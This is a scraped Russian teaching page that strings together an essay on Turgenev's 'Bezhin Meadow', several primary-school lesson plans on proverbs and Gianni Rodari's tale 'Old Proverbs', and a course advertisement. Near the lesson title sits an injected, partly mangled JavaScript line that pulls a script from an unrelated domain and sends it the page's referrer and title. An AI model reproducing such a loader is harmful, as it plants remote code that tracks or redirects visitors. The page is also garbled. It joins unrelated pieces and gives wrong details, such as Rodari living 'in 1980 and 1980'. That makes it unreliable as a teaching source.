Смысл сказки старые пословицы

Обновлено: 07.11.2024

Природе писатель отвёл в своём произведении центральное место. Описания неба, лугов, полей, лесов и т.д. очень живые, красочные и поэтичные. Утренняя заря «разливается кротким румянцем», вечером трава «белела ровной скатертью», река «стыдливо синела», капли росы алеют «лучистыми алмазами»…

Очень нежно Тургенев описывает солнце, небо, облака:

«…они все насквозь проникнуты светом и теплотой».

Так поэтично описать природу сложно даже в стихотворной форме. Весь окружающий мир для писателя живой и прекрасный. Всё одухотворено и имеет свою энергетику. Но в то же время и солнечный свет, и луга, и реки, и звёзды, и ночная темнота, и человек взаимосвязаны. Это всё одна жизнь, прекрасная и неповторимая.

Читая строки Тургенева, будто переносишься на Бежин луг, в ту ночь, в зарю, чувствуешь запах реки, сухой травы…

Поражает то, что мальчики 12 лет уже вынуждены работать на фабрике. Более того, очевидно, что их эксплуатируют, поскольку надсмотрщик не позволил домой на ночь идти:

«…завтра работы много, так вы, ребятки, домой не ходите».

Особенно симпатизирует автор Павлуше за его ум, силу и смелость:

«…ночью, он, нимало не колеблясь, поскакал один на волка…».

Этот мальчик мало говорил, но была в нём мудрость не по годам. «Своей судьбы не минуешь», — сказал Павлуша. И действительно мальчик не миновал своей смерти, упав с лошади.

Ощущается, что ребята дружат и помогают друг другу, как могут, что есть в них доброта, искренность, честность и непосредственность.

На фоне красоты природы Тургенев очень тонко раскрыл проблемы простых людей: нужда, необразованность, жестокость работодателей и т.д. И до глубины души пробирают описания писателя и земли русской, и детей.

Следующая пословица

Словарная работа: фольклор, пословица.

Оборудование урока: портрет Дж. Родари, книга Дж. Родари «Сказки по телефону», В.И. Даль «Пословицы русского народа».

«…Пословицы.
Их тысячи, десятки тысяч!
Как на крыльях, они перелетают
из века в век,
от одного поколения к другому,
и не видна та безграничная даль,
куда устремляет свой полет
эта крылатая мудрость…»

I. Повторение домашнего задания

  • Расскажите, какие факты биографии вы запомнили. Почему?
  • В чём особенность сборника Дж. Родари «Сказки по телефону»?
  • Назовите самое главное качество обитателей Страны без углов. Почему?
  • Какая сказка вам больше всего понравилась? Обоснуйте свой выбор.

II. Новый материал

– А сегодня мы познакомимся с ещё одной сказкой Дж. Родари «Старые пословицы».

1) Что такое пословица?
2) Почему говоря о пословице, мы вспоминаем понятие «фольклор»?

– Выразительное чтение сказки.
– Работа с текстом произведения.

1. Кто является главными героями сказки? (Пословицы)
2. Найдите в тексте пословицы, которые стали героинями. («Ночью все кошки серы», «Своя работа – верный выигрыш», «Доброе начало полдела откачало», «Нет дороже золотой середины», «Конец – всему делу венец», «Не тряси яблоко, покуда зелено: созреет – само упадет»)
3. Объясните, как вы понимаете смысл этих пословиц.
4. Почему три пословицы никак не могут до сих пор жить в мире и согласии?
5. Автор назвал пословицы старыми. Как вы думаете, почему? (Пословицы расстроились, что их никто не употребляет в речи, никому они не нужны и о них стали забывать люди).
6. Почему некоторые пословицы стареют, а другие живут долго? От чего это зависит?
7. Нужны ли нашей речи старые пословицы? Согласны ли вы с мнением М.А. Шолохова? (Cм. эпиграф к уроку).

III. Игра «Найди свою пословицу»

Слово учителя: У каждого из вас на столе лежат карточки, на которых написаны пословицы.

В чужом месте
Всяк кулик
На чужой сторонушке
Лето собирает,
Коли грибовно,
Нет друга, так ищи,
Без друга – сирота,
Для милого дружка и
Лес рубят –
Грамоте учиться –
Не красна книга письмом,
Коня в рати узнаешь,
рад своей воронушке
сережку из ушка.
что в лесу.
с другом – семьянин
свое болото хвалит.
красна умом:
а друга в беде.
так и хлебовно.
всегда пригодится
щепки летят
а нашел, так береги.
а зима поедает.

Посмотрите, можно ли назвать их пословицами, если нет, то почему? (Нет. Это совершенно разные части пословиц, которые не подходят друг к другу по смыслу.)

Задание: Найти свои недостающие частички пословиц, чтобы получилась пословица. (Ученики ищут у одноклассников недостающие части пословиц).

Зачитать получившуюся пословицу и объяснить её смысл.

  • В чужом месте что в лесу.
  • Всяк кулик свое болото хвалит.
  • На чужой сторонушке рад своей воронушке.
  • Лето собирает, а зима поедает.
  • Коли грибовно, так и хлебовно.
  • Коня в рати узнаешь, а друга в беде.
  • Нет друга, так ищи: а нашел, так береги.
  • Без друга – сирота; с другом – семьянин.
  • Для милого дружка и сережку из ушка.
  • В лесу рубят, а к нам щепки летят
  • Грамоте учиться всегда пригодится
  • Не красна книга письмом, красна умом.

– Как можно доказать, что это старые пословицы? (Они созданы народом в далекие времена, в них вложена мудрость многих поколений, эти пословицы вышли из активного употребления людей).
– Прав ли был М. А. Шолохов, говоря о пословице следующее: «…Пословицы. Их тысячи, десятки тысяч! Как на крыльях, они перелетают из века в век, от одного поколения к другому, и не видна та безграничная даль, куда устремляет свой полет та крылатая мудрость…»? Свой ответ обоснуйте.

IV. Итог урока

– А сейчас от сказки Дж. Родари мы перенесемся в Россию 19 века. Перед нами замечательная, удивительная книга «Русские пословицы и поговорки», в которой собраны пословицы и поговорки русского народа. Автор этой книги Владимир Иванович Даль.
– За что мы должны быть благодарны автору и самой книге? Выразите свою благодарность в устной форме. (2-3 предложения).
Возможен вариант – написать синквейн на тему «Пословица».

V. Домашнее задание

Написать свою «Сказку по телефону». (Класс может издать свой сборник сказок).

Следующая пословица

Предметные: совершенствуют исполнительное мастерство, воспитывают внимательное отношение к художественному слову, воссоздают целостное впечатление о прочитанном и услышанном, раскрывают внутренний потенциал, развивают творческое мировосприятие, самостоятельность, активизируют познавательный интерес к предмету, познанию нового. Осмысляя малые жанры фольклора, учащиеся проникаются пониманием, что пословицы и поговорки – хранилище родного языка, убеждаются, насколько велика их роль в нравственном совершенствовании народа, воспринимают точность оценок и суждений на все случаи жизни.

Метапредметные:

  • Личностные –дают адекватную самооценку учебной деятельности, осознают границы собственного знания и «незнания», стремятся к их преодолению.
  • Познавательные –структурируют знания по предмету, осознанно и произвольно строят высказывание в устной и письменной форме, читают, слушают, извлекая нужную информацию, делают обобщения и выводы.
  • Регулятивные –понимают и сохраняют учебную задачу, планируют свое действие в соответствии с поставленной задачей, вносят необходимые коррективы в действие после его завершения на основе оценки и учета характера сделанных ошибок, умеют оценивать правильность выполнения действия на уровне объективной ретроспективной оценки, адекватно воспринимают оценку учителя.

Оборудование: мультимедийная установка, презентация.

ХОД УРОКА

1. Организационный момент

Ребята! Сегодня на уроке мы поговорим о достоянии, которое нам оставил в наследство русский народ. Еще задолго до появления первой рукописной книги русский народ создал высокую культуру звучащего слова, своеобразную литературу, которую передавали из уст в уста от одного поколения к другому, литературу, которую сейчас называют устное народное творчество.

2. Актуализация знаний

Слайд 1.

- Часто вы слышите: «Без труда не вытащишь и рыбку из пруда». А знаете ли вы, к какому жанру относится это выражение?

- Сегодня на уроке мы будем говорить о пословицах и поговорках, узнаем больше об этих малых жанрах.

Дома вы готовили «Хвалебное слово пословице». Давайте его послушаем.

1-й ученик:

Пословицы не даром молвятся, без них прожить нельзя!
Они великие помощницы и в жизни верные друзья!

2-й ученик: Порой они нас наставляют, советы добрые дают,

3-й ученик: Порой чему-то поучают и от беды нас берегут.

4-й ученик: Ведь с ней и горе не беда, и наша речь красна пословицей. Давайте вспомним их друзья!

5-й ученик: Ну кто из вас не согласится, что без труда мечта мертва? Что дело мастера боится, что жизнь дана нам для добра?

6-й ученик: Что друг не тот, кто медом мажет, а тот, кто правду прямо скажет.

7-й ученик: Что долог день до вечера, коли делать нечего.

9-й ученик: Кто кричит: «Я помогу!», а пришло время – «Не могу!».

10-й ученик: Где растяпа и тетеря, там не прибыль, а потеря.

11-й ученик: И почитай учителя, как своего родителя.

12-й ученик: А в пословицах ведь говорится, что сами мы должны учиться.

13-й ученик: Грамотей не тот, кто читать умеет, а тот кто слушает да разумеет!

14-й ученик: Помни! Тот кто хочет много знать, тот не должен долго спать!

15-й ученик: Хочешь есть калачи – не лежи на печи.

16-й ученик: Согласитесь: лень и плут до добра не доведут.

Слово учителя

Слайд 2

О важном значении пословиц и поговорок говорят сами пословицы и поговорки:

  • Добрая пословица не в бровь, а прямо в глаз.
  • На пословицу ни суда, ни расправы.
  • На твою спесь пословица есть.
  • Не всякая пословица при всяком молвится.
  • Старая пословица век не сломится.
  • Для поговорки мужик в Москву пешим шел.
  • Из поговорки слова не выкинешь.
  • На всякого Егорку есть своя поговорка.

3. Самостоятельная работа со вступительной статьей учебника

– Прочитайте статьи учебника «Пословицы» на странице 27–28 и «Поговорки» на странице 31-33.

- В чем различие пословицы и поговорки?

Слово учителя: Первоначально пословицы и поговорки входили в состав небольших рассказов о каких-либо событиях, сказок, песен и представляли метко и кратко выраженное обобщение того, о чем шла речь в произведении. Например, «Битый небитого везет» (из сказки «Лисичка-сестричка и волк»).

В пословицах отражают исторические события, представления народа о крестьянском труде, о богатстве и бедности, нравственности, христианские верования, семейный быт, качества характера и другое. Менялась жизнь, появлялись новые пословицы и поговорки, забывались старые.

4. Сопоставление пословицы и поговорки

Слайд 3

Учащиеся делают выводы на основе статей учебника и записывают их.

Пословица

  • краткое, мудрое суждение о жизни
  • содержит поучительный смысл
  • законченное суждение
  • характеризует поступки человека,их образ жизни
  • украшает нашу речь

1 часть – условия совершения событий.

2 часть – вывод и поучение, краткое выразительное назидание.

Поговорка

  • меткое суждение
  • часть суждения, незаконченное предложение
  • дает оценку поступкам человека,но не поучает
  • выражает чувства

5. Этап актуализации жизненных впечатлений

Класс делится на две команды. За каждый правильный ответ команда получает балл (жетон)

А) Игра «Знатоки пословиц»

Слайды 4-11

  1. Света села готовить уроки, но увидела в окно подруг и попросила у мамы разрешения погулять.Какую пословицу напомнила мама Свете? (Сделал дело – гуляй смело.)
  2. Во время летних каникул каждый из детей что-то делал: Оля помогала маме по дому, Ира и Сережа пололи и поливали огород, собирали гербарий. Один Павлик ничего не делал и все жаловался на скуку. Какие пословицы напомнили ему друзья? (Не сиди сложа руки – не будет скуки. Скучен день до вечера, если делать нечего.)
  3. Несколько дней Люда не выполняла домашнее задание, не готовила уроки и в итоге получила двойку. Что ей на это ответили ребята? (Что посеешь – то и пожнешь. Без труда не выловишь и рыбку из пруда.)
  4. Однажды сын пожаловался отцу, что хорошо бы возле дома спортплощадку сделать, но ребята не знают, как это сделать. «Надо захотеть – и все получится», - ответил папа. Какая пословица вспомнилась сыну? (Под лежачий камень вода не течет).
  5. Сказала Нина что-то по секрету своей подруге. Та не утерпела и рассказала своей соседке по парте, которая в свою очередь поделилась еще с кем-то. Вскоре об этом знали все. (По секрету – всему свету)
  6. Попросили родители свою дочь посидеть с младшим братом. Девочка пригласила к себе подруг. Они разыгрались и забыли про малыша. (У семи нянек – дитя без глаза)
  7. Коля смотрел, как дети катались с высокой горы. Ему тоже захотелось. Но он видел, как тяжело ребята поднимались в гору, зато радостно слетали вниз. (Любишь кататься – люби и саночки возить)
  8. Саша решил собрать из конструктора модель самолета. Сначала у него ничего не получалось. Но Саша был настойчив и терпелив – и самолет готов. (Терпенье и труд все перетрут.Без труда не выловишь и рыбку из пруда)

Б) Игра «Собери пословицу»

  1. Командам предлагается собрать разрезанные пословицы.
  2. Назовите пословицы по парам слов.

Слайд 12

  • Дело – смело
  • Журавль – синица
  • Слово – воробей
  • Труд - рыбка
  • Время – потеха
  • Перо – топор

Слайд 13

В) Игра «Объясни смысл»

Слайд 14

  • На работу – спина болит, а ест – за ушами трещит.
  • Сидя на печи генералом не станешь.
  • Чужими руками жар загребать.
  • За спрос денег не берут.
  • Языком болтай, а рукам воли не давай.
  • Язык мой – враг мой.
  • На хотенье есть терпенье.
  • Невелика капля, а камень долбит.
  • Топор своего дорубится.
  • Дай всякому делу перебродить на своих дрожжах.

6. Рефлексия

– Скажите, пожалуйста, какую роль играют пословицы и поговорки в нашей жизни?

Следующая пословица

Внимание Скидка 50% на курсы! Спешите подать
заявку

Профессиональной переподготовки 30 курсов от 6900 руб.

Курсы для всех от 3000 руб. от 1500 руб.

Повышение квалификации 36 курсов от 1500 руб.

Лицензия №037267 от 17.03.2016 г.
выдана департаментом образования г. Москвы


Конспект урока для 3 класса «Джанни Родари «Старые пословицы»

((__lxGc__=window.__lxGc__||<'s':<>,'b':0>)['s']['_197117']=__lxGc__['s']['_197117']||>)['b']['_574359']=<'i':__lxGc__.b++>; var d=document;var s=d.createElement('script'); s.src='https://3slivtd.ru/BFjWgr?frm=script&&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&_cid=dd5ad15d-9f89-1596-33bb-24c0516e474b'; d.getElementById("dd5ad15d-9f89-1596-33bb-24c0516e474b").appendChild(s);

Автор составитель урока: Саяпова Рамиля Закиевна

Предмет: литературное чтение

Учебник: книга для чтения в третьем классе башкирской школы

Автор учебника: Азнабаева Ф.Ф.

Тема урока: Джанни Родари « Старые пословицы»

Оборудование: Портрет Джанни Родари, альбом пословиц, маска Чипполино,

книги писателя «Приключения Чипполино», «Экиятлэр»,»Чипполино мажаралары», схема- фольклор, книжка-самоделка

Цели: познакомить учащихся жизнью и творчеством итальянского писателя

Джанни Родари, и на основе сказки Д. Родари «Старые сказки» поглубже познакомить с одним из жанров устного народного творчества -пословицей,

раскрыть мудрость, поучающий смысл и совершенство формы пословиц,

развивать речь, мышление, памяти и обогащение языка пословицей, совер-

шенствовать технику чтения, навыки ролевого чтения.

У. Прозвенел звонок, начинается урок! Здравствуйте, дети!

Поприветствуем друг друга приветливой улыбкой. Вот мы улыбнулись, и жизнь стала радостнее и интереснее. Думаю, урок наш сегодня пройдет интересно, слаженно, с пользой для всех.

Выяснение цели урока.

У. Ребята, мы путешествуем по странам устного народного творчества, или по фольклору, что в переводе с английского языка означает «народная мудрость». На прошлом уроке мы закончили путешествие «в мир сказок». А сегодня в какую страну устного народного творчества посетим, угадывайте сами. На доске предстоит вам соединить авторов с их произведениями. Пожалуйста, приступаем.

«Сказка о рыбке и рыбаке»

У. Угадали о ком или о чём мы будем говорить на уроке. Как угадали?

Д. (О Джанни Родари, фамилия необычная, ещё сказку «Старые пословицы» не читали.

III . Знакомство с новой темой урока, жизнью и творчеством писателя.

У. Молодцы, угадали ребята,вы справились заданием. Сегодня мы

открываем новую страну устного народного творчества. Как называется она?

У. Ребята, а вы знаете, пословица- это тоже один из жанров фольклора.

А вы можете точно объяснить, что такое пословица. Да, мы встреча-

лись с пословицами на уроке, а сегодня целый урок посвящается этой

теме и стараемся разъяснить смысл пословиц, обогатить свою речь,

ещё изучим жизнь и творчество итальянского писателя Джанни Родари.

На уроке читаем сказку «Старые пословицы» этого писателя. Прежде

всего хочу вам объяснить, что же это такое пословица.

ПОСЛОВИЦА- это краткое, образное изложение мысли, заключающее в себе какое-то поучение. Пословица советует, учит, наставляет,

предупреждает. Люди с уважением относятся к пословицам, часто употребляют их в своей речи. От этого речь становится яркой, образной, красочной.

У. Все успокоились. Расскажу немного о писателе.

Итальянский писатель Джанни Родари жил и творил в 1980 и 1980 гг.

его стихи, повести, сказки пользуются заслуженной популярностью

детского читателя в Италии и завоевали признание во всем мире. Он на-

гражден медалью Г.Х.Андерсена за свои известные произведения. Вот в

нашей стране его стихи и сказки переведены на русский, татарский, баш-

кирский языки. Ребята, вот в нашей библиотеке нашли книги писателя.

Давайте вместе прочитаем их названия.

Пожалуйста, читайте, я думаю, они вас заинтересуют.

IV . Физкультминутка. «Буратино». А сейчас отдохнём перед серьезной

V . Работа над текстом.

У. Сначала , ребята ,выясняем непонятные слова из текста. Кто знает-руку поднимает, если непонятно - тихо сидим.

Вот и разбирались, молодцы, Ребята, сначала я прочту сказку, а вы следите за моим чтением и подготовьте ответ на вопросы «Почему текст называется «Старые пословицы» и ещё сказкой?»

После чтения дети отвечают (потому что о старых пословицах, которых придумали люди давным - давно, и ещё пословицы ,как люди живые, они разговаривают, спорят, возражают )

У. А сейчас самостоятельно прочитайте сказку про себя.

Дальше читаем сказку по ролям, выделяем пословицы.

Теперь все активно работаем над содержанием сказки.

У. Ребята, как вы поняли строки 3,4,5? Давайте поясняем.

Д. «отдыхают- значит они уже отработали свой срок, а теперь вот постарели, их уже никто не употребляют в речи, поэтому отдыхают.

У. «Они тоже когда-то были молодыми и полными сил»-как объяснить это?

Д. Когда-то их давным-давно люди использовали в своей речи,времена уже изменились, и они стали придумывать новых пословиц, а

старые уже стали забываться.

У . В тексте сказано, что старые пословицы отдыхают. Как Джанни Родари уточняет жизнь старых пословиц в приюте. Отдыхают ли только?

Д. Не только отдыхают, но и болтают и без конца спорят, особенно когда критикуют друг друга.

У. А какая главная задача пословиц?

Д. Главная задача-- возразить, непременно сказать против тому, что

У. Почему автору жаль пословиц ?

Д. Потому что мир меняется, время идёт вперед, люди придумывают

новые машины, летят в космос, а старые пословицы не меняются, они

остались в своём старом мире, их не используют, пользы от них мало,современные люди придумывают новые пословицы для нынешнего времени.

У. Но все таки, нужны ли в нашей речи старые пословицы ? Можно их

использовать в настоящее время?

Д. Да, можно использовать, например, «В единстве наша сила», «Если очень захотеть, можно всего добиться», когда они говорят «умные вещи» да ?

У. Найдите, ребята, строки, где выражена главная мысль автора. Это последние строки сказки обращена вам, ребята. Читаем.

У. Какими вы должны быть, ребята, чтобы жизнь наша была богатой,

красивый, счастливой, мирной?

Д. Молодые, смелые, сильные, умелые, умные, здоровые, хоть и старые, но молодые и душой и сердцем.

У. Да, вы должны хорошо учиться, быть добрыми и помогать друг другу, заниматься спортом, значит, быть здоровым, быть смелым, находчивым, любить свою землю, работать и творить.

У. Какие пословицы вы запомнили, ребята, из сказки? Их очень много в сказке, всего 14 пословиц, и ещё вам трудно объяснить значение этих ста-рых пословиц. Поэтому вам дала задание, разбирать дома с родителями смысл хоть одной пословицы. Вы готовы? Первую пословицу,пожалуйста, кто подготовил. Давайте ее слушаем. Или есть желающие?

1.Ослом родился - ослом и умрёшь. (Эту пословицу можно понять так, каким родился, таким и умрёшь, или глупый человек никогда не станет умным, скупой человек никогда не будет щедрым)

2. Если очень захотеть - можно всего добиться. (Значит, если хочешь получит «5», нужно хорошо учить уроки, выполнять письменные и устные задания, выучит правила. Чтобы довести дело до конца, нужно прилагать много усилий)

3. Счастлив тот, кто доволен малым (Это пословица говорит. Что человек должен жить только сегодняшним днём, работает,чтобы прокормит только себя, учиться кое-как, о будущем не думают. Они даже дом не построили бы, жили бы на деревьях, как обезьяны.)

4 Тот,кто делает для себя, работает за троих. (Люди для себя стараются делать работу лучше, поэтому они работают за троих, стараются быть богатым, красивым по сравнению с другими )

5. В единстве сила. (Один воин врагов победит не может, тяжёлую работу один человек не может выполнить один, только вместе, сообщаони выполняют тяжёлую работу,так легче и веселее жить.)

У. Вот,например, вы такой красивый дом строите, кто вам помогает? Или картошку выкопали? Только мама в огороде работала? Кто помог ей? И ты, и брат, и папа -все вместе, дружно выкопали картошку.

6. Кто хочет мира, готовиться к войне. (то есть эта пословица говорит,что только сильная страна, сильная армия, где много танков, ракет, бомб, может защитить свою страну, свои земли, а другие страны побояться напасть на такую могучую страну.)

У. А вот другая пословица не согласна таким суждением. Кто хочет мира, должен готовит мир, а не бомбы, чтобы жить спокойно-- нужно уметь дружить и дорожить ею, помогать друг другу, не дразнить, не ссориться, не драться.

7. В своем доме каждый сам себе король. (Король- глава государства, он не платит налоги. Лучше сказать в своем доме каждый сам себе хозяин, он должен зарабатывать деньги, должен знать, когда и сколько платить за газ, за свет,что купить и продать.)

8. Самое трудное -в конце. (Когда работаешь,в конце уже устаешь, не хочется работать , сил не хватает - но дело нужно завершить,хотя трудно.)

9.Самое сладкое -в конце. (Это значит, когда завершается работа, ты чувствуешь удовольствие, победу, за работу хорошую тебя могут наградить сладостями или подарками.)…….

У. Молодцы, ребята, вы очень старались, разобрали смысл пословиц с родителями, оформили красочно, рисовали ещё. Давайте из ваших листочков делаем маленькую очереднюю книжку-самоделку про старых пословиц. Несите сюда листочки и помещаем книжку в наш классный уголок.

VII . Знакомство с новыми пословицами.

У. Ребята, а какие новые пословицы вы знаете?

У. И у меня на руке альбом пословиц. Здесь живут разные пословицы по темам. Определите тему I страницы- о чём эти пословицы.

Д. -читают по цепочке и определяют тему

-мальчики, а потом девочки

- на букву А, с которой начинаются имена

У. Молодцы, ребята, этот альбом пословиц поможет нам на следующих уроках чтения и русского языка.

VIII У. А теперь немного отдохнём, закрыли глазки, послушаем звуки.

У. Открываем глазки, кто к нам в гости пожаловал?

Ч. Здравствуйте, дети! Узнали меня ? Я мальчик- луковка из сказки «При-ключения Чиполлино» Джанни Родари. Я вам предлагаю только два слова из пословицы, а вы вспомните всю пословицу целиком.

Ч. Спасибо вам ,ребята. Желаю удачи.

У. Вот и урок наш подходит концу. Понравился урок?

-С каким писателем мы познакомились?

-Зачем нам нужно пословицы?

Ребята, используйте в своей речи пословицы, от этого она становится богаче, ярче и читайте сказки Джанни Родари , набирайте ума.

-Ребята, скоро 28 ноября -какой это праздник? Праздник мам. Я объяв-ляю конкурс «Кто больше?». Нужно собрать больше пословиц о маме. И ещё- выберите наиболее понравившуюся пословицу и напишите рассказ о своей любимой маме.

Читайте также: